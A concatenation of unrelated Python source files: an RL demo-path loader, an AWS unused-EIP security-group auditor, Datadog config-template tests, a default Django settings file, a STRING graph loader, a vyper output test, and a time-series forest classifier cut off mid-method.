self.recompute_reward = recompute_reward
self.load_terminals = load_terminals
self.trainer.replay_buffer = self.replay_buffer
self.trainer.demo_train_buffer = self.demo_train_buffer
self.trainer.demo_test_buffer = self.demo_test_buffer
def load_path(self, path, replay_buffer, obs_dict=None):
rewards = []
path_builder = PathBuilder()
print("loading path, length", len(path["observations"]), len(path["actions"]))
H = min(len(path["observations"]), len(path["actions"]))
print("actions", np.min(path["actions"]), np.max(path["actions"]))
for i in range(H):
if obs_dict:
ob = path["observations"][i][self.obs_key]
next_ob = path["next_observations"][i][self.obs_key]
else:
ob = path["observations"][i]
next_ob = path["next_observations"][i]
action = path["actions"][i]
reward = path["rewards"][i]
terminal = path["terminals"][i]
if not self.load_terminals:
terminal = np.zeros(terminal.shape)
agent_info = path["agent_infos"][i]
env_info = path["env_infos"][i]
if self.recompute_reward:
reward = self.env.compute_reward(
action,
next_ob,
)
reward = np.array([reward])
rewards.append(reward)
terminal = np.array([terminal]).reshape((1, ))
path_builder.add_all(
observations=ob,
actions=action,
rewards=reward,
next_observations=next_ob,
terminals=terminal,
agent_infos=agent_info,
env_infos=env_info,
)
self.demo_trajectory_rewards.append(rewards)
path = path_builder.get_all_stacked()
replay_buffer.add_path(path)
print("path sum rewards", sum(rewards), len(rewards))
# self.env.initialize(zs)
def load_demos(self, ):
# Off policy
for demo_path in self.demo_paths:
self.load_demo_path(**demo_path)
# Parameterize which demo is being tested (and all jitter variants)
# If is_demo is False, we only add the demos to the
# replay buffer, and not to the demo_test or demo_train buffers
def load_demo_path(self, path, is_demo, obs_dict, train_split=None):
print("loading off-policy path", path)
data = list(load_local_or_remote_file(path))
# if not is_demo:
# data = [data]
# random.shuffle(data)
if train_split is None:
train_split = self.demo_train_split
N = int(len(data) * train_split)
print("using", N, "paths for training")
if self.add_demos_to_replay_buffer:
for path in data[:N]:
self.load_path(path, self.replay_buffer, obs_dict=obs_dict)
if is_demo:
for path in data[:N]:
self.load_path(path, self.demo_train_buffer, obs_dict=obs_dict)
for path in data[N:]:
self.load_path(path, self.demo_test_buffer, obs_dict=obs_dict)
def get_batch_from_buffer(self, replay_buffer):
batch = replay_buffer.random_batch(self.bc_batch_size)
batch = np_to_pytorch_batch(batch)
# obs = batch['observations']
# next_obs = batch['next_observations']
# goals = batch['resampled_goals']
# import ipdb; ipdb.set_trace()
# batch['observations'] = torch.cat((
# obs,
# goals
# ), dim=1)
# batch['next_observations'] = torch.cat((
# next_obs,
# goals
# ), dim=1)
return batch
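# Hedged sketch (not part of the original module): the demo_paths entries are
# forwarded to load_demo_path(**demo_path), so each dict uses that method's
# keyword names. The pickle path below is a made-up placeholder.
EXAMPLE_DEMO_PATHS = [
    dict(
        path="demos/example_demos.pkl",  # placeholder file
        is_demo=True,
        obs_dict=True,
        train_split=0.9,
    ),
]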
|
py | 7dfd1c7e5eba6fdfc9d1b7c91958e601880f7265 | #!/usr/bin/env python
'''
Class that allows us to take all unused ip addresses for a region, and search
through all security groups for its reference.
Options:
--region (optional, example: us-east-1, example: --all [searches all regions])
--ip_addresses (string): one or multiple ip addresses, comma separated, no spaces
'''
import os
import argparse
import boto3
from eip_auditor.lib import base
from emojipedia import Emojipedia
class Client(object):
"""docstring for Client.
@attributes:
client: An instance of the ECR boto3 client.
"""
def __init__(self, region=None, cidr=None):
"""Initializer
Args:
region (str): the aws region to check for unused IP Addreses
cidr (str|list): a list of ip addresses to search for in security groups
Returns:
String
"""
super(Client, self).__init__()
self.regions = []
self.default_region = 'us-east-1'
self.__set_region__(region)
self.access_key = os.getenv('AWS_ACCESS_KEY_ID', None)
self.secret_key = os.getenv('AWS_SECRET_ACCESS_KEY', None)
self.session = None
self.client = None
self.cidr = cidr
def perform(self):
"""Main method to be called to run this application.
Args:
N/A
Returns:
N/A
"""
print "Searching for usage in {}:\n".format(self.regions)
for i in self.regions:
self.session = boto3.Session(region_name=i)
self.client = self.session.client('ec2')
cidr_list = self.__set_cidr_list__(self.cidr, i)
if len(cidr_list) < 1:
print Emojipedia.search('smiling-face-with-smiling-eyes').character + " No unused IP addresses found " + Emojipedia.search('smiling-face-with-smiling-eyes').character
else:
for cidr in cidr_list:
print "\t{}/32".format(cidr)
print "\n"
self.describe_security_groups(cidr_list)
print "\n\n"
def describe_unused_ip_addresses(self):
"""Find unused IP addresses from a dict and map the names to a list
Args:
N/A
Returns:
rtn (list): List of unused IP Addresses
"""
rtn = []
for k in self.client.describe_addresses()['Addresses']:
if ('AssociationId' in k) or ('InstanceId' in k) or ('PrivateIpAddress' in k) or 'NetworkInterfaceId' in k:
continue
rtn.append(k['PublicIp'])
return rtn
def describe_security_groups(self, cidr_list):
"""Find unused IP addresses from a dict and map the names to a list
Args:
N/A
Returns:
rtn (list): List of unused IP Addresses
"""
filters = []
cidr_inbound_permission = {
'Name': 'ip-permission.cidr',
'Values': []
}
for k in cidr_list:
cidr_inbound_permission['Values'].append(
[
"{}/32".format(k)
]
)
cidr_inbound_permission['Values'] = base.flatten(cidr_inbound_permission['Values'])
filters.append(cidr_inbound_permission)
rtn = self.client.describe_security_groups(
Filters=filters
)
found_mapping = {}
if len(rtn['SecurityGroups']) > 0:
print Emojipedia.search('loudly-crying-face').character + " Found Unused IP Address(es) in the following SGs: " + Emojipedia.search('loudly-crying-face').character
for k in rtn['SecurityGroups']:
found_mapping[k['GroupId']] = []
for j in k['IpPermissions']:
for l in j['IpRanges']:
if l['CidrIp'] in cidr_inbound_permission['Values']:
found_mapping[k['GroupId']].append(l['CidrIp'])
for k in found_mapping:
print k + ": "
for j in found_mapping[k]:
print "\t" + j
print "\n"
else:
print Emojipedia.search('smiling-face-with-smiling-eyes').character + " Unused IP Addresses do not exist in any security group " + Emojipedia.search('smiling-face-with-smiling-eyes').character
return found_mapping
def __set_cidr_list__(self, cidr, region):
"""Determine which IP Addresses to look at, either determined by the user
or by a region list
Args:
cidr (str/list): cidr list or string determined by the user
region (str): the aws region to look in
Returns:
cidr_list (list): list of unused IP Addresses for a specific region
"""
cidr_list = []
if cidr is None:
print "Found the following unused EIPs in {}".format(region)
cidr_list = self.describe_unused_ip_addresses()
        elif isinstance(cidr, basestring):
            print "Setting CIDR list to argument value specified"
            cidr_list = cidr.split(",")
        else:
            print "Setting CIDR list to argument value specified"
            cidr_list = list(cidr)
return cidr_list
def __set_region__(self, region):
"""Determine which regions to look for unused IP Addresses in
Args:
region (str): the region passed by args
Returns:
N/A
"""
if region is None:
raise "Region not set."
elif region == "all":
self.regions = []
for i in boto3.client('ec2', region_name=self.default_region).describe_regions()['Regions']:
self.regions.append(i['RegionName'])
else:
self.regions = [region]
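# Hedged usage sketch (not part of the original module), based only on the
# constructor and perform() defined above; the region and the comma-separated
# addresses are placeholders.
def _example_audit():
    Client(region='us-east-1', cidr='203.0.113.10,203.0.113.11').perform()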
|
py | 7dfd1d35f6e7644e05696f8b7ef85f8698aa1f62 | # (C) Datadog, Inc. 2019-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import re
import pytest
from datadog_checks.dev import TempDir
from datadog_checks.dev.tooling.configuration.template import ConfigTemplates
from datadog_checks.dev.utils import ensure_parent_dir_exists, path_join, write_file
pytestmark = [pytest.mark.conf, pytest.mark.conf_template]
class TestLoadBasic:
def test_default(self):
templates = ConfigTemplates()
assert templates.load('init_config/tags') == {
'name': 'tags',
'value': {
'example': ['<KEY_1>:<VALUE_1>', '<KEY_2>:<VALUE_2>'],
'type': 'array',
'items': {'type': 'string'},
},
'description': (
'A list of tags to attach to every metric and service check emitted by this integration.\n'
'\n'
'Learn more about tagging at https://docs.datadoghq.com/tagging\n'
),
}
def test_custom_path_precedence(self):
with TempDir() as d:
template_file = path_join(d, 'init_config', 'tags.yaml')
ensure_parent_dir_exists(template_file)
write_file(template_file, 'test:\n- foo\n- bar')
templates = ConfigTemplates([d])
assert templates.load('init_config/tags') == {'test': ['foo', 'bar']}
def test_cache(self):
with TempDir() as d:
template_file = path_join(d, 'init_config', 'tags.yaml')
ensure_parent_dir_exists(template_file)
write_file(template_file, 'test:\n- foo\n- bar')
templates = ConfigTemplates([d])
templates.load('init_config/tags')
write_file(template_file, '> invalid')
assert templates.load('init_config/tags') == {'test': ['foo', 'bar']}
def test_unknown_template(self):
templates = ConfigTemplates()
with pytest.raises(ValueError, match='^Template `unknown` does not exist$'):
templates.load('unknown')
def test_parse_error(self):
with TempDir() as d:
template_file = path_join(d, 'invalid.yaml')
ensure_parent_dir_exists(template_file)
write_file(template_file, '> invalid')
templates = ConfigTemplates([d])
with pytest.raises(ValueError, match='^Unable to parse template `{}`'.format(re.escape(template_file))):
templates.load('invalid')
class TestLoadBranches:
def test_mapping(self):
templates = ConfigTemplates()
assert templates.load('init_config/tags.value.example') == ['<KEY_1>:<VALUE_1>', '<KEY_2>:<VALUE_2>']
def test_mapping_not_found(self):
templates = ConfigTemplates()
with pytest.raises(ValueError, match='^Template `init_config/tags` has no element `value.foo`$'):
templates.load('init_config/tags.value.foo')
def test_list(self):
templates = ConfigTemplates()
assert templates.load('instances/http.skip_proxy.value') == {'example': False, 'type': 'boolean'}
def test_list_not_found(self):
templates = ConfigTemplates()
with pytest.raises(ValueError, match='^Template `instances/http` has no named element `foo`$'):
templates.load('instances/http.foo')
def test_primitive(self):
templates = ConfigTemplates()
assert templates.load('instances/http.skip_proxy.value.example') is False
def test_primitive_recurse(self):
templates = ConfigTemplates()
with pytest.raises(
ValueError,
match=(
'^Template `instances/http.skip_proxy.value.example` does '
'not refer to a mapping, rather it is type `bool`$'
),
):
templates.load('instances/http.skip_proxy.value.example.foo')
class TestApplyOverrides:
def test_mapping(self):
templates = ConfigTemplates()
template = templates.load('init_config/tags')
errors = templates.apply_overrides(template, {'value.example': ['foo', 'bar']})
assert not errors
assert template == {
'name': 'tags',
'value': {'example': ['foo', 'bar'], 'type': 'array', 'items': {'type': 'string'}},
'description': (
'A list of tags to attach to every metric and service check emitted by this integration.\n'
'\n'
'Learn more about tagging at https://docs.datadoghq.com/tagging\n'
),
}
def test_mapping_with_branches(self):
templates = ConfigTemplates()
template = templates.load('init_config/tags.value')
errors = templates.apply_overrides(template, {'example': ['foo', 'bar']})
assert not errors
assert template == {'example': ['foo', 'bar'], 'type': 'array', 'items': {'type': 'string'}}
def test_mapping_with_name(self):
templates = ConfigTemplates()
template = templates.load('instances/tags')
overrides = {'tags.required': True}
templates.apply_overrides(template, overrides)
assert not overrides
assert template.get('required') is True
def test_list(self):
templates = ConfigTemplates()
template = templates.load('instances/http')
errors = templates.apply_overrides(template, {'skip_proxy.description': 'foobar'})
assert not errors
assert {
'name': 'skip_proxy',
'value': {'example': False, 'type': 'boolean'},
'description': 'foobar',
} in template
def test_list_with_branches(self):
templates = ConfigTemplates()
template = templates.load('instances/http.skip_proxy')
errors = templates.apply_overrides(template, {'description': 'foobar'})
assert not errors
assert template == {
'name': 'skip_proxy',
'value': {'example': False, 'type': 'boolean'},
'description': 'foobar',
}
def test_list_replace(self):
templates = ConfigTemplates()
original_template = templates.load('instances/http')
index = next(i for i, item in enumerate(original_template) if item.get('name') == 'skip_proxy') # no cov
template = templates.load('instances/http')
errors = templates.apply_overrides(template, {'skip_proxy': 'foobar'})
assert not errors
assert 'foobar' in template
assert template.index('foobar') == index
template.remove('foobar')
for item in template:
assert item.get('name') != 'skip_proxy'
def test_list_not_found(self):
templates = ConfigTemplates()
template = templates.load('instances/http')
errors = templates.apply_overrides(template, {'proxy.value.properties.foo.foo': 'bar'})
assert len(errors) == 1
assert errors[0] == 'Template override `proxy.value.properties` has no named mapping `foo`'
def test_list_not_found_root(self):
templates = ConfigTemplates()
template = templates.load('instances/http')
errors = templates.apply_overrides(template, {'foo': 'bar'})
assert len(errors) == 1
assert errors[0] == 'Template override has no named mapping `foo`'
def test_primitive(self):
templates = ConfigTemplates()
template = templates.load('instances/http')
errors = templates.apply_overrides(template, {'proxy.description.foo': 'bar'})
assert len(errors) == 1
assert errors[0] == 'Template override `proxy.description` does not refer to a mapping'
def test_primitive_recurse(self):
templates = ConfigTemplates()
template = templates.load('instances/http')
errors = templates.apply_overrides(template, {'proxy.description.foo.foo': 'bar'})
assert len(errors) == 1
assert errors[0] == 'Template override `proxy.description` does not refer to a mapping'
|
py | 7dfd1e6220e1d27d77d7f5069d12cae497896556 | """
Django settings for proj project.
Generated by 'django-admin startproject' using Django 3.2.5.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-v&na%llzfvn&^%_ezvru%$zs2%7wl7zfh26+demp!o)0q)x&4u'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'words'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'proj.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'proj.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
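# Hedged example (not part of the generated settings): since `rest_framework`
# is listed in INSTALLED_APPS, projects usually also declare DRF defaults here.
# The values below are illustrative assumptions, not settings this project uses.
#
# REST_FRAMEWORK = {
#     'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
#     'PAGE_SIZE': 10,
# }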
|
py | 7dfd1e73b9443579ca81ffdc8faa1b23b60696dc | """
This file offers the methods to automatically retrieve the graph Marinimicrobium sp. LS-A18.
The graph is automatically retrieved from the STRING repository.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
from typing import Dict
from ..automatic_graph_retrieval import AutomaticallyRetrievedGraph
from ...ensmallen import Graph # pylint: disable=import-error
def MarinimicrobiumSpLsA18(
directed: bool = False,
preprocess: bool = True,
load_nodes: bool = True,
verbose: int = 2,
cache: bool = True,
cache_path: str = "graphs/string",
version: str = "links.v11.5",
**additional_graph_kwargs: Dict
) -> Graph:
"""Return new instance of the Marinimicrobium sp. LS-A18 graph.
The graph is automatically retrieved from the STRING repository.
Parameters
-------------------
directed: bool = False
Whether to load the graph as directed or undirected.
By default false.
preprocess: bool = True
Whether to preprocess the graph to be loaded in
optimal time and memory.
load_nodes: bool = True
Whether to load the nodes vocabulary or treat the nodes
simply as a numeric range.
verbose: int = 2
Whether to show loading bars during the retrieval and building
of the graph.
cache: bool = True
Whether to use cache, i.e. download files only once
and preprocess them only once.
cache_path: str = "graphs"
Where to store the downloaded graphs.
version: str = "links.v11.5"
The version of the graph to retrieve.
The available versions are:
- homology.v11.5
- physical.links.v11.5
- links.v11.5
additional_graph_kwargs: Dict
Additional graph kwargs.
Returns
-----------------------
Instance of the Marinimicrobium sp. LS-A18 graph.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
return AutomaticallyRetrievedGraph(
graph_name="MarinimicrobiumSpLsA18",
repository="string",
version=version,
directed=directed,
preprocess=preprocess,
load_nodes=load_nodes,
verbose=verbose,
cache=cache,
cache_path=cache_path,
additional_graph_kwargs=additional_graph_kwargs
)()
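# Hedged usage sketch (added for illustration, not part of the upstream module):
# it only calls the retrieval function defined above; what `print(graph)` shows
# depends on the textual report provided by `ensmallen.Graph`.
if __name__ == "__main__":
    # Download (or load from cache) the undirected STRING graph for this species.
    graph = MarinimicrobiumSpLsA18(directed=False, version="links.v11.5")
    print(graph)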
|
py | 7dfd1f88b72e614bc131c0bba9884fe0a6303ce3 | #!/usr/bin/env python3
import vyper
from vyper.cli.vyper_json import format_to_output_dict
from vyper.compiler import OUTPUT_FORMATS, compile_codes
FOO_CODE = """
@public
def foo() -> bool:
return True
"""
def test_keys():
compiler_data = compile_codes({"foo.vy": FOO_CODE}, output_formats=list(OUTPUT_FORMATS.keys()))
output_json = format_to_output_dict(compiler_data)
assert sorted(output_json.keys()) == ["compiler", "contracts", "sources"]
assert output_json["compiler"] == f"vyper-{vyper.__version__}"
data = compiler_data["foo.vy"]
assert output_json["sources"]["foo.vy"] == {"id": 0, "ast": data["ast_dict"]["ast"]}
assert output_json["contracts"]["foo.vy"]["foo"] == {
"abi": data["abi"],
"devdoc": data["devdoc"],
"interface": data["interface"],
"ir": data["ir"],
"userdoc": data["userdoc"],
"evm": {
"bytecode": {"object": data["bytecode"], "opcodes": data["opcodes"]},
"deployedBytecode": {
"object": data["bytecode_runtime"],
"opcodes": data["opcodes_runtime"],
"sourceMap": data["source_map"]["pc_pos_map_compressed"],
},
"methodIdentifiers": data["method_identifiers"],
},
}
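# Hedged sketch of the same helpers used outside pytest: it reuses `compile_codes`
# and `format_to_output_dict` exactly as `test_keys` does above and just serializes
# the result; truncating the printed JSON is only for readability.
if __name__ == "__main__":
    import json
    compiler_data = compile_codes({"foo.vy": FOO_CODE}, output_formats=list(OUTPUT_FORMATS.keys()))
    print(json.dumps(format_to_output_dict(compiler_data), indent=2)[:500])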
|
py | 7dfd1fe72bbcbb220381e5c91c69150ec4af0e44 | from warnings import warn
from warnings import catch_warnings
from warnings import simplefilter
import numpy as np
import pandas as pd
from scipy.sparse import issparse
from sklearn.ensemble.forest import ForestClassifier
from sklearn.ensemble.forest import MAX_INT
from sklearn.ensemble.forest import _generate_sample_indices
from sklearn.ensemble.forest import _generate_unsampled_indices
from sklearn.ensemble.base import _partition_estimators
from sklearn.utils._joblib import Parallel, delayed
from sklearn.tree._tree import DOUBLE
from sklearn.utils import check_random_state
from sklearn.utils import check_array
from sklearn.utils import compute_sample_weight
from sklearn.utils.validation import check_is_fitted
from sklearn.exceptions import DataConversionWarning
from sklearn.tree import DecisionTreeClassifier
from ..pipeline import Pipeline
from ..transformers.series_to_tabular import RandomIntervalFeatureExtractor
from ..utils.time_series import time_series_slope
__all__ = ["TimeSeriesForestClassifier"]
class TimeSeriesForestClassifier(ForestClassifier):
"""Time-Series Forest Classifier.
A time series forest is a meta estimator and an adaptation of the random forest
for time-series/panel data that fits a number of decision tree classifiers on
various sub-samples of a transformed dataset and uses averaging to improve the
predictive accuracy and control over-fitting. The sub-sample size is always the same as the original
input sample size, but the samples are drawn with replacement only if `bootstrap=True` (this implementation defaults to `bootstrap=False`).
Parameters
----------
base_estimator : Pipeline
A pipeline consisting of series-to-tabular transformers
and a decision tree classifier as final estimator.
n_estimators : integer, optional (default=500)
The number of trees in the forest.
criterion : string, optional (default="entropy")
The function to measure the quality of a split. Supported criteria are
"gini" for the Gini impurity and "entropy" for the information gain.
Note: this parameter is tree-specific.
max_depth : integer or None, optional (default=None)
The maximum depth of the tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
min_samples_split : int, float, optional (default=2)
The minimum number of samples required to split an internal node:
- If int, then consider `min_samples_split` as the minimum number.
- If float, then `min_samples_split` is a fraction and
`ceil(min_samples_split * n_samples)` are the minimum
number of samples for each split.
min_samples_leaf : int, float, optional (default=1)
The minimum number of samples required to be at a leaf node.
A split point at any depth will only be considered if it leaves at
least ``min_samples_leaf`` training samples in each of the left and
right branches. This may have the effect of smoothing the model,
especially in regression.
- If int, then consider `min_samples_leaf` as the minimum number.
- If float, then `min_samples_leaf` is a fraction and
`ceil(min_samples_leaf * n_samples)` are the minimum
number of samples for each node.
min_weight_fraction_leaf : float, optional (default=0.)
The minimum weighted fraction of the sum total of weights (of all
the input samples) required to be at a leaf node. Samples have
equal weight when sample_weight is not provided.
max_features : int, float, string or None, optional (default=None)
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a fraction and
`int(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=sqrt(n_features)`.
- If "sqrt", then `max_features=sqrt(n_features)` (same as "auto").
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
max_leaf_nodes : int or None, optional (default=None)
Grow trees with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
min_impurity_decrease : float, optional (default=0.)
A node will be split if this split induces a decrease of the impurity
greater than or equal to this value.
The weighted impurity decrease equation is the following::
N_t / N * (impurity - N_t_R / N_t * right_impurity
- N_t_L / N_t * left_impurity)
where ``N`` is the total number of samples, ``N_t`` is the number of
samples at the current node, ``N_t_L`` is the number of samples in the
left child, and ``N_t_R`` is the number of samples in the right child.
``N``, ``N_t``, ``N_t_R`` and ``N_t_L`` all refer to the weighted sum,
if ``sample_weight`` is passed.
min_impurity_split : float, (default=1e-7)
Threshold for early stopping in tree growth. A node will split
if its impurity is above the threshold, otherwise it is a leaf.
bootstrap : boolean, optional (default=False)
Whether bootstrap samples are used when building trees.
oob_score : bool (default=False)
Whether to use out-of-bag samples to estimate
the generalization accuracy.
n_jobs : int or None, optional (default=None)
The number of jobs to run in parallel for both `fit` and `predict`.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
verbose : int, optional (default=0)
Controls the verbosity when fitting and predicting.
warm_start : bool, optional (default=False)
When set to ``True``, reuse the solution of the previous call to fit
and add more estimators to the ensemble, otherwise, just fit a whole
new forest. See :term:`the Glossary <warm_start>`.
class_weight : dict, list of dicts, "balanced", "balanced_subsample" or \
None, optional (default=None)
Weights associated with classes in the form ``{class_label: weight}``.
If not given, all classes are supposed to have weight one. For
multi-output problems, a list of dicts can be provided in the same
order as the columns of y.
Note that for multioutput (including multilabel) weights should be
defined for each class of every column in its own dict. For example,
for four-class multilabel classification weights should be
[{0: 1, 1: 1}, {0: 1, 1: 5}, {0: 1, 1: 1}, {0: 1, 1: 1}] instead of
[{1:1}, {2:5}, {3:1}, {4:1}].
The "balanced" mode uses the values of y to automatically adjust
weights inversely proportional to class frequencies in the input data
as ``n_samples / (n_classes * np.bincount(y))``
The "balanced_subsample" mode is the same as "balanced" except that
weights are computed based on the bootstrap sample for every tree
grown.
For multi-output, the weights of each column of y will be multiplied.
Note that these weights will be multiplied with sample_weight (passed
through the fit method) if sample_weight is specified.
Attributes
----------
estimators_ : list of DecisionTreeClassifier
The collection of fitted sub-estimators.
classes_ : array of shape = [n_classes] or a list of such arrays
The classes labels (single output problem), or a list of arrays of
class labels (multi-output problem).
n_classes_ : int or list
The number of classes (single output problem), or a list containing the
number of classes for each output (multi-output problem).
n_features_ : int
The number of features when ``fit`` is performed.
n_outputs_ : int
The number of outputs when ``fit`` is performed.
feature_importances_ : array of shape = [n_features]
The feature importances (the higher, the more important the feature).
oob_score_ : float
Score of the training dataset obtained using an out-of-bag estimate.
oob_decision_function_ : array of shape = [n_samples, n_classes]
Decision function computed with out-of-bag estimate on the training
set. If n_estimators is small it might be possible that a data point
was never left out during the bootstrap. In this case,
`oob_decision_function_` might contain NaN.
"""
def __init__(self,
base_estimator=None,
n_estimators=500,
criterion='entropy',
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features=None,
max_leaf_nodes=None,
min_impurity_decrease=0.,
min_impurity_split=None,
bootstrap=False,
oob_score=False,
n_jobs=None,
random_state=None,
verbose=0,
warm_start=False,
class_weight=None,
check_input=True):
if base_estimator is None:
features = [np.mean, np.std, time_series_slope]
steps = [('transform', RandomIntervalFeatureExtractor(n_intervals='sqrt', features=features)),
('clf', DecisionTreeClassifier())]
base_estimator = Pipeline(steps)
elif not isinstance(base_estimator, Pipeline):
raise ValueError('Base estimator must be pipeline with transforms.')
elif not isinstance(base_estimator.steps[-1][1], DecisionTreeClassifier):
raise ValueError('Last step in base estimator pipeline must be DecisionTreeClassifier.')
# Rename estimator params according to name in pipeline.
estimator = base_estimator.steps[-1][0]
estimator_params = {
"criterion": criterion,
"max_depth": max_depth,
"min_samples_split": min_samples_split,
"min_samples_leaf": min_samples_leaf,
"min_weight_fraction_leaf": min_weight_fraction_leaf,
"max_features": max_features,
"max_leaf_nodes": max_leaf_nodes,
"min_impurity_decrease": min_impurity_decrease,
"min_impurity_split": min_impurity_split,
}
estimator_params = {f'{estimator}__{pname}': pval for pname, pval in estimator_params.items()}
# Pass on params.
super(TimeSeriesForestClassifier, self).__init__(
base_estimator=base_estimator,
n_estimators=n_estimators,
estimator_params=tuple(estimator_params.keys()),
bootstrap=bootstrap,
oob_score=oob_score,
n_jobs=n_jobs,
random_state=random_state,
verbose=verbose,
warm_start=warm_start,
class_weight=class_weight
)
# Assign random state to pipeline.
base_estimator.set_params(**{'random_state': random_state, 'check_input': False})
# Store renamed estimator params.
for pname, pval in estimator_params.items():
self.__setattr__(pname, pval)
self.check_input = check_input
def fit(self, X, y, sample_weight=None):
"""Build a forest of trees from the training set (X, y).
Parameters
----------
X : array-like or sparse matrix of shape = [n_samples, n_features]
The training input samples. Internally, its dtype will be converted
to ``dtype=np.float32``. If a sparse matrix is provided, it will be
converted into a sparse ``csc_matrix``.
y : array-like, shape = [n_samples] or [n_samples, n_outputs]
The target values (class labels in classification, real numbers in
regression).
sample_weight : array-like, shape = [n_samples] or None
Sample weights. If None, then samples are equally weighted. Splits
that would create child nodes with net zero or negative weight are
ignored while searching for a split in each node. In the case of
classification, splits are also ignored if they would result in any
single class carrying a negative weight in either child node.
Returns
-------
self : object
"""
# Validate or convert input data
if sample_weight is not None:
sample_weight = check_array(sample_weight, ensure_2d=False)
if issparse(X):
# Pre-sort indices to avoid that each individual tree of the
# ensemble sorts the indices.
X.sort_indices()
# Remap output
self.n_features_ = X.shape[1] if X.ndim == 2 else 1
y = np.atleast_1d(y)
if y.ndim == 2 and y.shape[1] == 1:
warn("A column-vector y was passed when a 1d array was"
" expected. Please change the shape of y to "
"(n_samples,), for example using ravel().",
DataConversionWarning, stacklevel=2)
if y.ndim == 1:
# reshape is necessary to preserve the data contiguity against vs
# [:, np.newaxis] that does not.
y = np.reshape(y, (-1, 1))
self.n_outputs_ = y.shape[1]
y, expanded_class_weight = self._validate_y_class_weight(y)
if getattr(y, "dtype", None) != DOUBLE or not y.flags.contiguous:
y = np.ascontiguousarray(y, dtype=DOUBLE)
if expanded_class_weight is not None:
if sample_weight is not None:
sample_weight = sample_weight * expanded_class_weight
else:
sample_weight = expanded_class_weight
# Check parameters
self._validate_estimator()
if not self.bootstrap and self.oob_score:
raise ValueError("Out of bag estimation only available"
" if bootstrap=True")
random_state = check_random_state(self.random_state)
if not self.warm_start or not hasattr(self, "estimators_"):
# Free allocated memory, if any
self.estimators_ = []
n_more_estimators = self.n_estimators - len(self.estimators_)
if n_more_estimators < 0:
raise ValueError('n_estimators=%d must be larger or equal to '
'len(estimators_)=%d when warm_start==True'
% (self.n_estimators, len(self.estimators_)))
elif n_more_estimators == 0:
